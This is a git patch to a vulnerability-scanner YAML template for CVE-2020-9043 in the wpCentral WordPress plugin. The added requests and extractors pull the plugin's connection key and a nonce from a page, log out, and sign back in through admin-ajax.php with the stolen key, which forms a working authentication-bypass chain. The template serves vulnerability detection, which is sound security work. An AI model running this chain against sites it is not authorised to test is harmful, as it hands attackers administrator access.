From 9aec19a49cdc0f928d1403a069f595f4df2341fe Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sun, 24 Jul 2022 22:51:53 +0530
Subject: [PATCH] Update CVE-2020-9043.yaml

---
 cves/2020/CVE-2020-9043.yaml | 27 ++++++++++++++++++++++++---
 1 file changed, 24 insertions(+), 3 deletions(-)

diff --git a/cves/2020/CVE-2020-9043.yaml b/cves/2020/CVE-2020-9043.yaml
index 6ddff2f9c5..9cba2f9308 100644
--- a/cves/2020/CVE-2020-9043.yaml
+++ b/cves/2020/CVE-2020-9043.yaml
@@ -32,19 +32,40 @@ requests:
         GET /wp-admin/index.php HTTP/1.1
         Host: {{Hostname}}
 
+      - |
+        GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1
+        Host: {{Hostname}}
+
+    redirects: true
+    max-redirects: 2
     cookie-reuse: true
     req-condition: true
     matchers:
       - type: dsl
         dsl:
-          - "contains(all_headers_2, 'text/html')"
-          - "status_code_2 == 200"
-          - "contains(body_2, 'wpCentral Connection Key')"
+          - "contains(all_headers_4, 'text/html')"
+          - "status_code_4 == 200"
+          - "contains(body_4, 'wpCentral Connection Key')"
+          - contains(body_4, "pagenow = \'dashboard\'")
         condition: and
 
     extractors:
       - type: regex
+        name: authkey
         part: body
         group: 1
         regex:
           - 'style="word-wrap:break-word;">([a-z0-9]+)'
+        internal: true
+
+      - type: regex
+        name: nonce
+        part: body
+        group: 1
+        regex:
+          - '_wpnonce=([0-9a-z]+)'
+        internal: true